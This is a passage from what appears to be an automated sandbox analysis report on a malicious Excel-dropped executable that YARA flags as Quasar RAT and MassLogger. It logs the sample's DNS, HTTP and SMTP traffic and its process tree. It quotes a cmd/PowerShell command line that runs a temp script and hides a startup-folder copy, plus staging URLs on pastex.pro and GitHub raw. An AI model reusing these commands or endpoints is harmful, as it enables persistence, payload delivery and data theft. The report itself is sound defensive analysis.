Feb 22, 2021 20:36:30.270618916 CET	53	50183	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.389144897 CET	61531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:30.446027040 CET	53	61531	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:30.964181900 CET	49228	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:31.027055979 CET	53	49228	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:31.684195042 CET	59794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:31.741703987 CET	53	59794	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:32.248416901 CET	55916	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:32.308609962 CET	53	55916	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:32.781590939 CET	52752	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:32.842658043 CET	53	52752	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:33.457366943 CET	60542	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:33.516851902 CET	53	60542	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:34.382621050 CET	60689	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:34.444055080 CET	53	60689	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:35.435549021 CET	64206	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:35.495372057 CET	53	64206	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:36.516894102 CET	50904	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:36.574115038 CET	53	50904	8.8.8.8	192.168.2.4
Feb 22, 2021 20:36:37.390105009 CET	57525	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:36:37.447454929 CET	53	57525	8.8.8.8	192.168.2.4
Feb 22, 2021 20:37:00.909001112 CET	53814	53	192.168.2.4	8.8.8.8
Feb 22, 2021 20:37:00.969053984 CET	53	53814	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 22, 2021 20:35:56.991658926 CET	192.168.2.4	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 20:34:52.415822029 CET	192.168.2.4	8.8.8.8	0x8967	Standard query (0)	www.seyranikenger.com.tr	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.390264988 CET	192.168.2.4	8.8.8.8	0xfa17	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.654545069 CET	192.168.2.4	8.8.8.8	0x1e8b	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.430989027 CET	192.168.2.4	8.8.8.8	0x304	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.674863100 CET	192.168.2.4	8.8.8.8	0x5c3d	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.741672993 CET	192.168.2.4	8.8.8.8	0xdabe	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.854551077 CET	192.168.2.4	8.8.8.8	0xfeb3	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:55.892837048 CET	192.168.2.4	8.8.8.8	0x8561	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.932419062 CET	192.168.2.4	8.8.8.8	0x8561	Standard query (0)	pastex.pro	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.158576965 CET	192.168.2.4	8.8.8.8	0xb744	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:26.419395924 CET	192.168.2.4	8.8.8.8	0x2f9f	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.475675106 CET	192.168.2.4	8.8.8.8	0x2f9f	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.767416954 CET	192.168.2.4	8.8.8.8	0xb879	Standard query (0)	smtp.saleforceconsults.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 22, 2021 20:34:52.636853933 CET	8.8.8.8	192.168.2.4	0x8967	No error (0)	www.seyranikenger.com.tr	seyranikenger.com.tr		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:34:52.636853933 CET	8.8.8.8	192.168.2.4	0x8967	No error (0)	seyranikenger.com.tr		185.162.146.6	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.495822906 CET	8.8.8.8	192.168.2.4	0xfa17	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:02.705847025 CET	8.8.8.8	192.168.2.4	0x1e8b	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.490880966 CET	8.8.8.8	192.168.2.4	0x304	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:26.723582983 CET	8.8.8.8	192.168.2.4	0x5c3d	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.220.115	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.48.44	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.140.41	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.252.4	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.189.250	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.96.218	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.800513983 CET	8.8.8.8	192.168.2.4	0xdabe	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.76.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.220.115	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.48.44	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.140.41	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.252.4	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.189.250	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.96.218	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:45.903126001 CET	8.8.8.8	192.168.2.4	0xfeb3	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.76.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.989854097 CET	8.8.8.8	192.168.2.4	0x8561	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:56.991533995 CET	8.8.8.8	192.168.2.4	0x8561	No error (0)	pastex.pro		45.148.121.68	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:35:57.207247972 CET	8.8.8.8	192.168.2.4	0xb744	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	smtp.saleforceconsults.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	smtp.saleforceconsults.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

pastex.pro

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49739	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:02.584227085 CET	1467	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:02.643884897 CET	1467	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:02 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49747	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:26.578821898 CET	2090	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:26.635423899 CET	2091	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:26 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49751	54.225.220.115	80	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:46.221090078 CET	2707	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Feb 22, 2021 20:35:46.361371994 CET	2708	IN	HTTP/1.1 200 OK Server: Cowboy Connection: keep-alive Content-Type: text/plain Vary: Origin Date: Mon, 22 Feb 2021 19:35:46 GMT Content-Length: 11 Via: 1.1 vegur Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 Data Ascii: 84.17.52.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49754	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:57.087357998 CET	2755	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:57.143479109 CET	2755	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:57 GMT Server: LiteSpeed

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 22, 2021 20:34:52.822681904 CET	185.162.146.6	443	192.168.2.4	49731	CN=webdisk.seyranikenger.com.tr CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Jan 02 09:19:01 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri Apr 02 10:19:01 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 22, 2021 20:34:52.822681904 CET	185.162.146.6	443	192.168.2.4	49731	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 22, 2021 20:35:02.844924927 CET	185.199.108.133	443	192.168.2.4	49741	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:02.844924927 CET	185.199.108.133	443	192.168.2.4	49741	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:26.871342897 CET	185.199.108.133	443	192.168.2.4	49748	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:26.871342897 CET	185.199.108.133	443	192.168.2.4	49748	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:57.410118103 CET	185.199.108.133	443	192.168.2.4	49755	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:57.410118103 CET	185.199.108.133	443	192.168.2.4	49755	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 22, 2021 20:36:28.710617065 CET	587	49761	208.91.199.223	192.168.2.4	220 us2.outbound.mailhostbox.com ESMTP Postfix
Feb 22, 2021 20:36:28.711088896 CET	49761	587	192.168.2.4	208.91.199.223	EHLO 715575
Feb 22, 2021 20:36:28.877445936 CET	587	49761	208.91.199.223	192.168.2.4	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Feb 22, 2021 20:36:28.877710104 CET	49761	587	192.168.2.4	208.91.199.223	STARTTLS
Feb 22, 2021 20:36:29.041897058 CET	587	49761	208.91.199.223	192.168.2.4	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 7032 Parent PID: 800

General

Start time:	20:34:46
Start date:	22/02/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xf00000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: a.exe PID: 6200 Parent PID: 7032

General

Start time:	20:34:52
Start date:	22/02/2021
Path:	C:\ProgramData\a.exe
Wow64 process (32bit):	true
Commandline:	C:\PROGRAMDATA\a.exe
Imagebase:	0x410000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 8%, Metadefender, Browse Detection: 28%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6632 Parent PID: 6200

General

Start time:	20:35:04
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6616 Parent PID: 6632

General

Start time:	20:35:05
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 2860 Parent PID: 6632

General

Start time:	20:35:05
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 4
Imagebase:	0xcd0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 4180 Parent PID: 6632

General

Start time:	20:35:10
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Imagebase:	0x20000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5596 Parent PID: 6632

General

Start time:	20:35:12
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0xf40000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: a.exe PID: 740 Parent PID: 3424

General

Start time:	20:35:22
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x540000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: a.exe PID: 6072 Parent PID: 740

General

Start time:	20:35:31
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	false
